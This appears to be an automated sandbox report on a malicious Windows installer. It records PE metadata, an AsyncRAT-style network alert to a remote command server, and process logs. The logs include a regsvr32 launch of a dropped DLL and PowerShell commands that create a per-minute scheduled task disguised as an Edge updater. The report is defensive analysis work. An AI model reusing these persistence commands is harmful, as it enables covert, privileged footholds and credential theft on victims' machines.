IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x20000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e350	0x24c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x143f8	0x14400	c9bb3afc1ceaaa31127ccfa204c657ef	False	0.5487316743827161	data	6.482216817915366	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x16000	0xbe8	0xc00	1ba5adf2e1058c0460dcc814ba86fb32	False	0.6246744791666666	data	6.005798728198158	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x17000	0xd9c	0xe00	d5b22eff9e08edaa95f493c1a71158c0	False	0.2924107142857143	data	2.669288666959085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x18000	0x574c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1e000	0xf9e	0x1000	b47eaca4c149ee829de76a342b5560d5	False	0.35595703125	data	4.9677831942996935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1f000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x20000	0x18	0x200	3746f5876803f8f30db5bb2deb8772ae	False	0.05078125	data	0.190488766434666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x21000	0x102d4	0x10400	fe2478415e1581a70914dfc06f95f5e6	False	0.30955528846153846	data	5.124529477041404	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2150c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	English	United States	0.23902439024390243
RT_ICON	0x21b74	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.38306451612903225
RT_ICON	0x21e5c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.597972972972973
RT_ICON	0x21f84	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.6084754797441365
RT_ICON	0x22e2c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.8172382671480144
RT_ICON	0x236d4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.7276011560693642
RT_ICON	0x23c3c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.4179460580912863
RT_ICON	0x261e4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.6719043151969981
RT_ICON	0x2728c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.8315602836879432
RT_STRING	0x276f4	0xc4	data			0.5969387755102041
RT_STRING	0x277b8	0xcc	data			0.6225490196078431
RT_STRING	0x27884	0x174	data			0.5510752688172043
RT_STRING	0x279f8	0x39c	data			0.34523809523809523
RT_STRING	0x27d94	0x34c	data			0.4218009478672986
RT_STRING	0x280e0	0x294	data			0.4106060606060606
RT_RCDATA	0x28374	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x3065c	0x10	data			1.5
RT_RCDATA	0x3066c	0x1a0	data			0.8149038461538461
RT_RCDATA	0x3080c	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x30838	0x84	data	English	United States	0.6363636363636364
RT_VERSION	0x308bc	0x4b8	COM executable for DOS	English	United States	0.2855960264900662
RT_MANIFEST	0x30d74	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T13:54:49.264763+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	144.202.34.112	56001	192.168.2.6	49952	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 13:54:48.701648951 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:48.706423044 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:48.706499100 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:48.713896036 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:48.718699932 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:48.749716997 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:48.754508972 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:49.239095926 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:49.239156008 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:49.239222050 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:49.259989023 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:49.264763117 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:49.388621092 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:49.468127012 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:51.285958052 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:51.290826082 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:54:51.290885925 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:54:51.295653105 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:09.236325026 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:09.280642033 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:09.326706886 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:09.374392986 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.512564898 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.517414093 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:20.517462015 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.522207975 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:20.721147060 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:20.765091896 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.816849947 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:20.858802080 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.869229078 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.874083996 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:20.874128103 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:20.878890038 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:29.251753092 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:29.296346903 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:29.342197895 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:29.390065908 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:49.252211094 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:49.296442032 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:49.342639923 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:49.390263081 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.515675068 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.520498991 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:51.520574093 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.525357962 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:51.721124887 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:51.765117884 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.811619043 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:51.816565990 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.821367025 CET	56001	49952	144.202.34.112	192.168.2.6
Jan 2, 2025 13:55:51.821408987 CET	49952	56001	192.168.2.6	144.202.34.112
Jan 2, 2025 13:55:51.826219082 CET	56001	49952	144.202.34.112	192.168.2.6

Target ID:	0
Start time:	07:53:59
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\8n26gvrXUM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8n26gvrXUM.exe"
Imagebase:	0x400000
File size:	1'479'422 bytes
MD5 hash:	C6F9F0EC394A72FB302EFBCF74DA2EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:54:00
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp" /SL5="$203E2,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
Imagebase:	0x400000
File size:	1'181'184 bytes
MD5 hash:	BCC236A3921E1388596A42B05686FF5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:54:00
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:54:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:54:00
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 3
Imagebase:	0xb50000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\8n26gvrXUM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Imagebase:	0x400000
File size:	1'479'422 bytes
MD5 hash:	C6F9F0EC394A72FB302EFBCF74DA2EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp" /SL5="$30426,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
Imagebase:	0x400000
File size:	1'181'184 bytes
MD5 hash:	BCC236A3921E1388596A42B05686FF5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
Imagebase:	0x4d0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	/s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
Imagebase:	0x7ff79b3f0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:54:03
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:54:14
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:54:14
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:54:16
Start date:	02/01/2025
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
Imagebase:	0x7ff79b3f0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:54:17
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5824, Parent PID: 5352

General

Target ID:	17
Start time:	07:54:17
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 02441D20 Relevance: 10.8, Strings: 8, Instructions: 796COMMON

Download Yara Rule

Strings

invalid distance code, xrefs: 024424E6
invalid distance too far back, xrefs: 0244256E
invalid literal/length code, xrefs: 0244234E
invalid bit length repeat, xrefs: 0244211A, 0244212A
invalid literal/lengths set, xrefs: 0244210A
too many length or distance symbols, xrefs: 02441E78
invalid distances set, xrefs: 02442174
invalid code lengths set, xrefs: 02441E68

Memory Dump Source

Source File: 00000002.00000002.2158795361.0000000002441000.00000020.00000001.01000000.00000006.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.2158769498.0000000002440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2158813120.0000000002443000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_8n26gvrXUM.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-3031085480
Opcode ID: eeb08c8356d9f56fe774a1a6a9df29cdcc614ab4269f685b735e4a74ab19c073
Instruction ID: 62d2cdf99b49707c3fe0c666b72d2face2bc8975dd1950e1ebf13da11ef9dd68
Opcode Fuzzy Hash: eeb08c8356d9f56fe774a1a6a9df29cdcc614ab4269f685b735e4a74ab19c073
Instruction Fuzzy Hash: EF624B756087458FDB08DF18C890A6ABBE1FF88304F04496EF896CB745EBB5D945CB81

Function 02441260 Relevance: 4.2, Strings: 3, Instructions: 415COMMON

Download Yara Rule

Strings

invalid distance code, xrefs: 02441650
invalid distance too far back, xrefs: 0244163B
invalid literal/length code, xrefs: 0244166A

Memory Dump Source

Source File: 00000002.00000002.2158795361.0000000002441000.00000020.00000001.01000000.00000006.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.2158769498.0000000002440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2158813120.0000000002443000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_8n26gvrXUM.jbxd

Similarity

API ID:
String ID: invalid distance code$invalid distance too far back$invalid literal/length code
API String ID: 0-3255898291
Opcode ID: c8f1502a24b0ece081aa6722af53b20c0ade1a412c846e39fea09afbe166c5a6
Instruction ID: daf796276b67d882329327a1d7ddf570f50879a6e45332fdbf328c9f1a0beaed
Opcode Fuzzy Hash: c8f1502a24b0ece081aa6722af53b20c0ade1a412c846e39fea09afbe166c5a6
Instruction Fuzzy Hash: 2AE180316083858FD708CF28C59466AFBE1EBC5304F584A6EE8DAC7342EB75D94ACB51

Analysis Process: regsvr32.exePID: 796, Parent PID: 1664COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	33
Total number of Limit Nodes:	7

Executed Functions

Function 00007FFD34520060 Relevance: 143.2, Strings: 108, Instructions: 8171COMMON

Download Yara Rule

Strings

pcF4, xrefs: 00007FFD345208CD
+F4, xrefs: 00007FFD34523EBC
H, xrefs: 00007FFD34522F4B
(vF4, xrefs: 00007FFD34520C69
nF4, xrefs: 00007FFD34520328
8jF4, xrefs: 00007FFD34520545
@(F4, xrefs: 00007FFD34524CB8
h6F4, xrefs: 00007FFD345238A7
(vF4, xrefs: 00007FFD34520C55
P$F4, xrefs: 00007FFD3452418D
(3F4, xrefs: 00007FFD34523AF5
xkF4, xrefs: 00007FFD34520463
X{F4, xrefs: 00007FFD3452231B
P$F4, xrefs: 00007FFD34524233
~F4, xrefs: 00007FFD34521FC7
AF4, xrefs: 00007FFD34521BCF
p.F4, xrefs: 00007FFD34523D87
88F4, xrefs: 00007FFD345237D5
h6F4, xrefs: 00007FFD3452382F
p.F4, xrefs: 00007FFD34523E2D
yF4, xrefs: 00007FFD34522777
+F4, xrefs: 00007FFD34523E69
(MF4, xrefs: 00007FFD34521455
HVF4, xrefs: 00007FFD34520EFB
@(F4, xrefs: 00007FFD34524D41
P$F4, xrefs: 00007FFD345241F4
@HF4, xrefs: 00007FFD345218C5
IF4, xrefs: 00007FFD3452175F
(iF4, xrefs: 00007FFD345206D9
IF4, xrefs: 00007FFD345216E7
AF4, xrefs: 00007FFD34521B43
91_H, xrefs: 00007FFD345202C1
yF4, xrefs: 00007FFD3452284D
IF4, xrefs: 00007FFD345216D3
0_H, xrefs: 00007FFD34523A6D
x9F4, xrefs: 00007FFD345234C7
h6F4, xrefs: 00007FFD345238F1
P1F4, xrefs: 00007FFD34523C91
&1_H, xrefs: 00007FFD345215C1
P1F4, xrefs: 00007FFD34523BFF
X{F4, xrefs: 00007FFD34522393
P1F4, xrefs: 00007FFD34523BEB
88F4, xrefs: 00007FFD34523713
+F4, xrefs: 00007FFD34523E55
xRF4, xrefs: 00007FFD345210BF
8jF4, xrefs: 00007FFD345205F7
(3F4, xrefs: 00007FFD34523A63
(3F4, xrefs: 00007FFD34523AB6
88F4, xrefs: 00007FFD345236FF
x9F4, xrefs: 00007FFD345234DB
p.F4, xrefs: 00007FFD34523DEE
x9F4, xrefs: 00007FFD34523553
(MF4, xrefs: 00007FFD34521393
x9F4, xrefs: 00007FFD3452359D
xkF4, xrefs: 00007FFD34520515
0_H, xrefs: 00007FFD34523E73
yF4, xrefs: 00007FFD34522803
hUF4, xrefs: 00007FFD34521057
pcF4, xrefs: 00007FFD345208E1
xRF4, xrefs: 00007FFD34521139
P$F4, xrefs: 00007FFD345241A1
nF4, xrefs: 00007FFD3452035D
xRF4, xrefs: 00007FFD345210D3
(iF4, xrefs: 00007FFD345206A1
hUF4, xrefs: 00007FFD34520FF1
@HF4, xrefs: 00007FFD345217EF
HzF4, xrefs: 00007FFD3452253F
~F4, xrefs: 00007FFD34521FB3
HVF4, xrefs: 00007FFD34520F75
HzF4, xrefs: 00007FFD34522553
IF4, xrefs: 00007FFD345217A9
xkF4, xrefs: 00007FFD345204DD
88F4, xrefs: 00007FFD3452378B
@HF4, xrefs: 00007FFD3452187B
h6F4, xrefs: 00007FFD3452381B
pcF4, xrefs: 00007FFD34520947
~F4, xrefs: 00007FFD3452203F
HzF4, xrefs: 00007FFD345225CB
nF4, xrefs: 00007FFD345202B7
P1F4, xrefs: 00007FFD34523C52
+F4, xrefs: 00007FFD34523EFB
H, xrefs: 00007FFD34524001
HVF4, xrefs: 00007FFD34520F0F
HVF4, xrefs: 00007FFD34520FAD
(MF4, xrefs: 00007FFD3452137F
hUF4, xrefs: 00007FFD3452108F
(iF4, xrefs: 00007FFD34520627
@HF4, xrefs: 00007FFD34521803
pcF4, xrefs: 00007FFD3452097F
@(F4, xrefs: 00007FFD34524D0B
X{F4, xrefs: 00007FFD34522307
(vF4, xrefs: 00007FFD34520CCF
8jF4, xrefs: 00007FFD345205BF
HzF4, xrefs: 00007FFD34522615
AF4, xrefs: 00007FFD34521C19
xRF4, xrefs: 00007FFD34521171
(3F4, xrefs: 00007FFD34523A4F
8jF4, xrefs: 00007FFD34520559
(iF4, xrefs: 00007FFD3452063B
(vF4, xrefs: 00007FFD34520D07
nF4, xrefs: 00007FFD345202CB
AF4, xrefs: 00007FFD34521B57
~F4, xrefs: 00007FFD34522089
@(F4, xrefs: 00007FFD34524CA4
(MF4, xrefs: 00007FFD3452140B
yF4, xrefs: 00007FFD3452278B
hUF4, xrefs: 00007FFD34520FDD
X{F4, xrefs: 00007FFD345223DD

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
